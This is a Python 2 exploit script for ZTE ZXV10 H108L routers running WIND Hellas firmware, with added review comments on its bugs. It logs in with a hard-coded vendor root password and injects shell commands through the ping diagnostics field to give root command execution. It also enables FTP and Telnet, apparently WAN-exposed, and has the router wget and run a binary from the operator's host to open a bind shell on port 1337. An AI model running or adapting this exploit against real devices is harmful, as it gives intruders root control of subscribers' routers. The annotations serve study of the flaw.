#!/usr/bin/python
# ---------------------------------------------------------------------------------------------------------------
# ZTE ZXV10 H108L Router with <= V1.0.01_WIND_A01 - RCE Root Exploit
# Copyright (c) 2013 Anastasios Stasinopoulos <stasinopoulos@unipi.gr>
# ---------------------------------------------------------------------------------------------------------------
# ZTE ZXV10 H108L router with WIND Hellas's custom software is vulnerable to an OS command injection attack.
# By using this vulnerability an attacker is able to execute arbitrary system commands with root privileges.
# ---------------------------------------------------------------------------------------------------------------
# Tested on ZTE:
# [*] Model name : ZTE ZXV10 H108L
# [*] Software Version : V1.0.01_WIND_A01 <~ WIND Hellas's *latest* software update! :)
# [*] Hardware Version : V1.1.00
# [*] Boot Loader Version : V1.0.04
# ---------------------------------------------------------------------------------------------------------------
# ztexploit.py tested on Backtrack 5 r3
# ---------------------------------------------------------------------------------------------------------------
# 05 Sep 2013: Vulnerability reported to Information Security Officer of WIND HELLAS
# 05 Sep 2013: Confirmation from Customer Service Department of WIND HELLAS, that our request is being processed.
# ---------------------------------------------------------------------------------------------------------------
import urllib, re, time, os, sys, urllib2, commands
# -------------------------------------------------
# Login used for every request in this script.  The original author
# describes it as a hidden vendor 'root' account that also works on Telnet.
# If genuine, it is a shared, firmware-wide credential (a backdoor from the
# subscriber's point of view), not something the device owner configured.
# -------------------------------------------------
username = "root"
password = "W!n0&oO7."
# -------------------------------------------------
# Stock 'admin' account, left here for reference only.
# -------------------------------------------------
#username = "admin"
#password = "admin"
os.system('clear')  # spawns a shell just to clear the terminal
##
# ANSI colour escapes used for the OK / FALSE markers further down.
RED, GREEN, RESET = '\033[31m', '\033[32m', '\033[0;0m'
##
# Banner; one print keeps the four lines together.  The parenthesised
# single-argument form prints identically under Python 2 and 3.
print("\n".join((
    "+-----------------------------------------------------------------+",
    "| ZTE ZXV10 H108L with <= V1.0.01_WIND_A01 - RCE Root Exploit |",
    "| Anastasios Stasinopoulos (c) 2013 - <stasinopoulos@unipi.gr> |",
    "+-----------------------------------------------------------------+",
)))
try:
    # Interactive session (Python 2 only: print statements, raw_input,
    # urllib2, commands).  Prompts for the router address, logs in with the
    # hard-coded credentials defined above, prints the device identity found
    # on template.gch, then offers the menu.  This outer try exists only to
    # catch Ctrl-C and the sys.exit() calls further down.
    target = raw_input("\nEnter the address of the ZTE router\n> ")
    # Accepts a bare host/IP.  Only the literal "http://" prefix is
    # recognised; an "https://..." input becomes "http://https://...".
    if target[:7] != "http://":
        target = "http://"+target
    try:
        # Fetch the login page to harvest the per-page login token it embeds.
        response = urllib.urlopen(target)
        html_data = response.read()
        sys.stdout.write(" [*] Retrieving random login token...\r")
        sys.stdout.flush()
        time.sleep(3)  # cosmetic pause; nothing depends on it
        # The token is assigned by inline JavaScript on the login page
        # (pattern: ...Frm_Logintoken").value = "<token>";).  The greedy
        # (.*) is fine as long as that assignment sits on one line.
        Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";', html_data)
        if Frm_Logintoken :
            sys.stdout.write(" ["+GREEN+" OK "+RESET+"]\n")
            time.sleep(1)
            Frm_Logintoken = str(Frm_Logintoken[0])
            # POST the login form with the token and the hard-coded
            # credentials.  The response is read but never inspected, so a
            # failed login is not detected here; the menu appears regardless.
            do_login =[('Frm_Logintoken',Frm_Logintoken),('Username',username),('Password',password)]
            do_login = urllib.urlencode(do_login)
            page = target+"/login.gch"
            request = urllib2.Request(page, do_login)
            response = urllib2.urlopen(request)
            html_data = response.read()
            # NOTE(review): the POST goes through urllib2 while every other
            # request uses urllib.urlopen; the two share no cookie jar.  If
            # the device tracks the session by cookie rather than by client
            # IP, everything below is effectively unauthenticated -- confirm
            # on a device before relying on the login step.
            # Scrape the device identity page.
            info = target+"/template.gch"
            response = urllib.urlopen(info)
            html_data = response.read()
            print " [*] Login token: "+GREEN+Frm_Logintoken+RESET
            # Each field is pulled from a <td id="Frm_..." class="tdright">
            # cell; a miss simply skips that line of the banner.
            Frm_ModelName = re.findall(r'Frm_ModelName" class="tdright">(.*)<', html_data)
            if Frm_ModelName :
                Frm_ModelName = str(Frm_ModelName[0])
                print " [*] Model Name: "+GREEN+Frm_ModelName+RESET
            # Serial number pattern has no closing '<', so it captures to
            # end of line (trailing markup included).
            Frm_SerialNumber = re.findall(r'Frm_SerialNumber" class="tdright">(.*)', html_data)
            if Frm_SerialNumber :
                Frm_SerialNumber = str(Frm_SerialNumber[0])
                print " [*] Serial Number: "+GREEN+Frm_SerialNumber+RESET
            # NOTE(review): the next two labels look swapped relative to the
            # field names (Frm_SoftwareVerExtent is printed as "Hardware
            # Version", Frm_HardwareVer as "Software Version"); verify against
            # the device page before trusting the banner.
            Frm_SoftwareVerExtent = re.findall(r'Frm_SoftwareVerExtent" class="tdright">(.*)<', html_data)
            if Frm_SoftwareVerExtent :
                Frm_SoftwareVerExtent = str(Frm_SoftwareVerExtent[0])
                print " [*] Hardware Version: "+GREEN+Frm_SoftwareVerExtent+RESET
            Frm_HardwareVer = re.findall(r'Frm_HardwareVer" class="tdright">(.*)<', html_data)
            if Frm_HardwareVer :
                Frm_HardwareVer = str(Frm_HardwareVer[0])
                print " [*] Software Version: "+GREEN+Frm_HardwareVer+RESET
            Frm_BootVer = re.findall(r'Frm_BootVer" class="tdright">(.*)<', html_data)
            if Frm_BootVer :
                Frm_BootVer= str(Frm_BootVer[0])
                print " [*] Boot Loader Version: "+GREEN+Frm_BootVer+RESET
            # Main menu.  Every valid option ends in sys.exit() (option 1
            # only leaves via 'q' -> sys.exit()), so there is no way back to
            # this menu once an option has run; only an invalid choice loops.
            print"\nWelcome to 'ZTEXPLOIT' main menu:"
            print" 1. Pseudo-Terminal access."
            print" 2. Enable FTP access."
            print" 3. Enable TELNET access."
            print" 4. Bind shell on port 1337."
            print" 5. Quit."
            while True:
                choice = raw_input("\nEnter your choice: ")
                if choice == "1":
                    # Command loop.  Each command is injected into the 'Host'
                    # field of the ping diagnostics page
                    # (manager_dev_ping_t.gch): the field value becomes
                    # ";echo $(<cmd>)", so the device's shell runs <cmd> and
                    # the echoed output lands in the ping result box.  The
                    # whole query string is sent percent-encoded inside the
                    # path (%3F, %26, %3D); the device evidently decodes it --
                    # whether that matters for the injection is not visible
                    # here.
                    print "\nPseudo-Terminal (type 'q' for quit)"
                    print "Enter your command:"
                    while True:
                        cmd = raw_input("# ")
                        if cmd == "q":
                            sys.exit(1)
                        else:
                            # cmd is interpolated raw -- no urllib.quote().
                            # Characters that matter in a URL ('&', '#', '%',
                            # '+', whitespace) are not escaped; '+' in
                            # particular arrives as a space.  Commands using
                            # them will be mangled or truncated.
                            payload = "/getpage.gch%3Fpid%3D1002%26nextpage%3Dmanager_dev_ping_t.gch%26Host%3D%3Becho+%24("+cmd+")%26NumofRepeat%3D1%26DataBlockSize%3D64%26DiagnosticsState%3DRequested%26IF_ACTION%3Dnew%26IF_IDLE%3Dsubmit"
                            exploit = target + payload
                            response = urllib.urlopen(exploit)
                            time.sleep(3)  # fixed wait; DiagnosticsState is never polled
                            html_data = response.read()  # read and discarded
                            # Re-fetch the page to read the result textarea.
                            page = target+"/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch"
                            response = urllib.urlopen(page)
                            html_data = response.read()
                            # The result box holds the command echo followed by
                            # the ping arguments " -c 1 -s 64" (NumofRepeat and
                            # DataBlockSize from the query).  First try the
                            # single-line case: everything in front of " -c"
                            # on the textarea's first line.
                            shell = re.findall(r'textarea_1">(.*) -c', html_data)
                            if shell:
                                print shell  # prints the list repr, not bare text
                            else:
                                # Fallback for multi-line output.
                                # NOTE(review): shell1[0] raises IndexError when
                                # the textarea is missing altogether (e.g. an
                                # error page came back); that is not an IOError,
                                # so it escapes the handler below as a traceback.
                                shell1 = re.findall(r'textarea_1">(.*)', html_data)
                                if shell1[0] == "-c 1 -s 64":
                                    print "No response on '"+cmd+"' command!"
                                else:
                                    # Unanchored: any line containing " -c"
                                    # anywhere in the page matches.
                                    shell2 = re.findall(r'(.*) -c', html_data)
                                    shell = shell1+shell2
                                    if shell[0] != "</textarea>":
                                        print shell
                                    else:
                                        print "No response on '"+cmd+"' command!"
                elif choice == "2":
                    print "\nPlease wait..."
                    print "Enabling FTP deamon on "+target+"...\n"
                    # Same injection point as option 1, but the raw command
                    # (including its literal space) is placed after the ';'
                    # instead of being wrapped in echo $(...).
                    cmd = "vsftpd start"
                    payload = "/getpage.gch%3Fpid%3D1002%26nextpage%3Dmanager_dev_ping_t.gch%26Host%3D%3B"+cmd+"%26NumofRepeat%3D1%26DataBlockSize%3D64%26DiagnosticsState%3DRequested%26IF_ACTION%3Dnew%26IF_IDLE%3Dsubmit"
                    enable_ftp = target + payload
                    response = urllib.urlopen(enable_ftp)
                    time.sleep(10)  # fixed waits; nothing checks that the daemon came up
                    html_data = response.read()
                    time.sleep(5)
                    target = target.replace('http://','')
                    # NOTE(review): the operator-supplied target is spliced
                    # into a shell command line unescaped (an address carrying
                    # a path, port or shell metacharacters goes straight to
                    # /bin/sh).  It only affects the operator's own machine,
                    # but subprocess.call(["ftp", target]) would avoid it.
                    os.system("ftp "+str(target))
                    sys.exit(1)
                elif choice == "3":
                    print "\nPlease wait..."
                    print "Enabling TELNET deamon on "+target+"...\n"
                    # Not a command injection: this submits the service-control
                    # form (sec_sc_t.gch, IF_ACTION=apply) with Enable=1 rows
                    # for the LAN and WAN views.  The meaning of the Servise
                    # codes (1 and 8) is not visible here; the author's intent
                    # is to expose Telnet, apparently on the WAN side as well
                    # (INCName0/INCName2 = WAN) -- verify on a device.
                    payload = "/getpage.gch%3Fpid%3D1002%26nextpage%3Dsec_sc_t.gch%26IF_ACTION%3Dapply%26IF_ERRORSTR%3DSUCC%26IF_ERRORPARAM%3DSUCC%26IF_ERRORTYPE%3D-1%26ViewName%3DNULL%26Enable%3D1%26INCViewName%3DIGD.LD1%26INCName%3DLAN%26MinSrcIp%3D0.0.0.0%26MinSrcMask%3DNULL%26MaxSrcIp%3D0.0.0.0%26FilterTarget%3D1%26Servise%3D8%26ViewName0%3DIGD.FWSc.FWSC1%26Enable0%3D1%26INCViewName0%3DIGD.WANIF%26INCName0%3DWAN%26MinSrcIp0%3D%26MinSrcMask0%3D0.0.0.0%26MaxSrcIp0%3D%26FilterTarget0%3D1%26Servise0%3D1%26ViewName1%3DIGD.FWSc.FWSC2%26Enable1%3D1%26INCViewName1%3DIGD.LD1%26INCName1%3DLAN%26MinSrcIp1%3D%26MinSrcMask1%3D0.0.0.0%26MaxSrcIp1%3D%26FilterTarget1%3D0%26Servise1%3D8%26ViewName2%3DIGD.FWSc.FWSC3%26Enable2%3D1%26INCViewName2%3DIGD.WANIF%26INCName2%3DWAN%26MinSrcIp2%3D%26MinSrcMask2%3D0.0.0.0%26MaxSrcIp2%3D%26FilterTarget2%3D1%26Servise2%3D8%26IF_INDEX%3D1%26IF_INSTNUM%3D3"
                    enable_telnet = target + payload
                    # NOTE(review): typo -- the result is bound to 'resonse',
                    # so the read() below consumes the stale template.gch
                    # response (already read above).  The request itself is
                    # still sent, and html_data is never used afterwards, so
                    # this is harmless but misleading.
                    resonse = urllib.urlopen(enable_telnet)
                    time.sleep(10)
                    html_data = response.read()
                    time.sleep(5)
                    target = target.replace('http://','')
                    # Same unescaped os.system() concern as option 2.
                    os.system("telnet "+str(target))
                    sys.exit(1)
                elif choice == "4":
                    # Stages a prebuilt binary named 'shell' (not part of this
                    # file) in the operator's own Apache document root, then
                    # makes the router download and run it.  Assumes root on
                    # the operator host (cp into /var/www, service restart)
                    # and a binary built for the router's CPU -- nothing here
                    # checks either.
                    host = raw_input("\nEnter your local address\n> ")
                    if host[:7] != "http://":
                        host = "http://"+host
                    os.system("cp shell /var/www/")
                    print "\nChecking apache2 service state..."
                    os.system("service apache2 restart >/dev/null 2>&1")
                    print "Please wait for bind shell on port 1337...\n"
                    # Injected chain: fetch into /tmp, chmod 777 (broader than
                    # needed; 700 would do), run it, then echo a directory
                    # listing into the ping result.  Because the commands run
                    # sequentially, the echo (and the ping request) only
                    # completes after ./shell returns -- if the binary does not
                    # background itself the request blocks.  The listing is
                    # never read back: html_data below is read and dropped.
                    cmd = "cd /tmp; wget "+host+"/shell; chmod 777 shell; ./shell; echo $(ls)"
                    # 'cmd' again goes into the URL unescaped (spaces, ';' and
                    # the host URL included).
                    payload = "/getpage.gch%3Fpid%3D1002%26nextpage%3Dmanager_dev_ping_t.gch%26Host%3D%3B"+cmd+"%26NumofRepeat%3D1%26DataBlockSize%3D64%26DiagnosticsState%3DRequested%26IF_ACTION%3Dnew%26IF_IDLE%3Dsubmit"
                    bind_shell = target + payload
                    response = urllib.urlopen(bind_shell)
                    time.sleep(10)
                    html_data = response.read()
                    time.sleep(5)
                    target = target.replace('http://','')
                    # Probe the port with the local netcat and look for the
                    # word 'open' in its output.  That wording depends on the
                    # netcat build installed; variants that print 'succeeded!'
                    # instead would be reported here as a failure.
                    res1 = commands.getoutput("nc -z -v "+str(target)+ " 1337")
                    res = re.findall(r'open', res1)
                    if res:
                        print "Woohoo! Got bind shell on port 1337..."
                        # Whatever listens on 1337 is reachable by anyone who
                        # can reach the device; the binary is not in this file,
                        # so its access control (if any) is unknown.
                        os.system("nc "+str(target)+" 1337")
                    else:
                        print "Bind shell connection failed!"
                    sys.exit(1)
                elif choice == "5":
                    print("Goodbye.")
                    sys.exit(1)
                else:
                    print("Wrong Option!")
        else:
            # No token in the page (e.g. a different device/firmware or a
            # changed login page); the script cannot tell which.
            sys.stdout.write(" ["+RED+" FALSE "+RESET+"]\n")
    except IOError, e:
        # Only network/HTTP failures land here (Python 2 syntax; 'e' is
        # unused).  Regex misses and IndexError are not caught.
        print "Failed to connect on "+target
except (KeyboardInterrupt, SystemExit):
    # NOTE(review): catching SystemExit swallows every sys.exit(1) above: the
    # handler prints a blank line and the script then falls off the end, so
    # the process exit status is 0, not 1.  Re-raise, or drop SystemExit from
    # the tuple, to keep the intended status.
    print ""
# EOF